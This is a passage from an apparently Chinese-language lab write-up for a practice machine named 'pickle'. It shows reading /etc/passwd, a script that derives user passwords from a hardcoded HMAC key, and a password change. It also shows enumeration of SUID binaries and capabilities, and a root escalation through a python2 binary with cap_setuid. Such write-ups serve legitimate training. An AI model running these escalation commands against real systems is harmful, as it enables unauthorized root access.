bbb8aae57c104cda40c93843ad5e6db8.log\n(remote) lucas@pickle:\/opt\/project\/uploads$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/bin\/bash\nlucas:x:1000:1000:lucas,,,:\/home\/lucas:\/bin\/bash\nmark:x:1001:1001::\/home\/mark:\/bin\/bash<\/code><\/pre>\n\u5229\u7528<\/h3>\n
\u5c1d\u8bd5\u4f7f\u7528\u811a\u672c\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
import hashlib\nimport socket\nimport base64\nimport hmac\n\nuser=['lucas', 'mark']\nfor i in user:\n key = "dpff43f3p214k31301"\n raw = i + key + socket.gethostbyname(socket.gethostname())\n hashed = hmac.new(key, raw, hashlib.sha1)\n print("[+] USER:",i)\n print(base64.b64encode(hashed.digest().encode("base64").rstrip("\\n")))<\/code><\/pre>\n\u5c1d\u8bd5\u8fd0\u884c\uff1a<\/p>\n
(remote) lucas@pickle:\/opt\/project\/uploads$ cd \/tmp\n(remote) lucas@pickle:\/tmp$ nano exp.py&&chmod +x exp.py\n(remote) lucas@pickle:\/tmp$ python2 exp.py \n('[+] USER:', 'lucas')\nYTdYYTB1cDFQOTBmeEFwclVXZVBpTCtmakx3PQ==\n('[+] USER:', 'mark')\nSUk5enROY2FnUWxnV1BUWFJNNXh4amxhc00wPQ==<\/code><\/pre>\n\u5c1d\u8bd5\u4fee\u6539\u5bc6\u7801\u4ee5\u53ca\u5207\u6362\u7528\u6237\uff1a<\/p>\n
(remote) lucas@pickle:\/tmp$ passwd lucas\nChanging password for lucas.\nCurrent password: \nNew password: \n# lucas\nRetype new password: \nYou must choose a longer password\nNew password: \nRetype new password: \npasswd: password updated successfully\n# lucas123456<\/code><\/pre>\n<\/div><\/p>\npython\u7684capabilities\u6743\u9650\u63d0\u6743root<\/h2>\nmark@pickle:~$ ls -la\ntotal 3640\ndrwxr-x--- 4 mark mark 4096 Oct 12 2020 .\ndrwxr-xr-x 4 root root 4096 Oct 12 2020 ..\n-rw------- 1 mark mark 1 Oct 12 2020 .bash_history\n-rw-r--r-- 1 mark mark 220 Apr 18 2019 .bash_logout\n-rw-r--r-- 1 mark mark 3526 Apr 18 2019 .bashrc\ndrwx------ 3 mark mark 4096 Oct 12 2020 .gnupg\ndrwxr-xr-x 3 mark mark 4096 Oct 11 2020 .local\n-rw-r--r-- 1 mark mark 807 Apr 18 2019 .profile\n-rwxr-xr-x 1 root root 3689352 Oct 11 2020 python2\n-rw-r----- 1 mark mark 33 Oct 11 2020 user.txt\nmark@pickle:~$ cat user.txt \ne25fd1b9248d1786551e3412adc74f6f\nmark@pickle:~$ whereis python2\npython2: \/usr\/bin\/python2.7 \/usr\/bin\/python2.7-config \/usr\/bin\/python2 \/usr\/lib\/python2.7 \/etc\/python2.7 \/usr\/local\/lib\/python2.7 \/usr\/include\/python2.7 \/usr\/share\/man\/man1\/python2.1.gz\nmark@pickle:~$ ls -la \/usr\/bin\/python2.7\n-rwxr-xr-x 1 root root 3689352 Oct 10 2019 \/usr\/bin\/python2.7\nmark@pickle:~$ ls -la \/usr\/bin\/python2\nlrwxrwxrwx 1 root root 9 Mar 4 2019 \/usr\/bin\/python2 -> python2.7\nmark@pickle:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/pkexec\n\/usr\/bin\/gpasswd\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/bin\/su\nmark@pickle:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\nmark@pickle:~$ whereis getcap\ngetcap: \/usr\/bin\/getcap \/usr\/share\/man\/man8\/getcap.8.gz\nmark@pickle:~$ \/usr\/bin\/getcap -r \/ 2>\/dev\/null\n\/home\/mark\/python2 = cap_setuid+ep\n\/usr\/bin\/ping = cap_net_raw+ep<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff1ahttps:\/\/gtfobins.github.io\/gtfobins\/python\/#capabilities<\/a><\/p>\n<\/div><\/p>\nmark@pickle:~$ \/home\/mark\/python2 -c 'import os; os.setuid(0); os.system("\/bin\/bash")'<\/code><\/pre>\n
![\"image-20240912155957278\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121746221.png\")
<\/div><\/p>\n![\"image-20240912161537797\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121746222.png\")
<\/div><\/p>\n![\"image-20240912172902329\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121746223.png\")
<\/div><\/p>\n![\"image-20240912174009181\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121746224.png\")
<\/div><\/p>\n![\"image-20240912174544462\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121746225.png\")
<\/div><\/p>\n![\"image-20240912174617982\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409121746226.png\")
<\/div><\/p>\n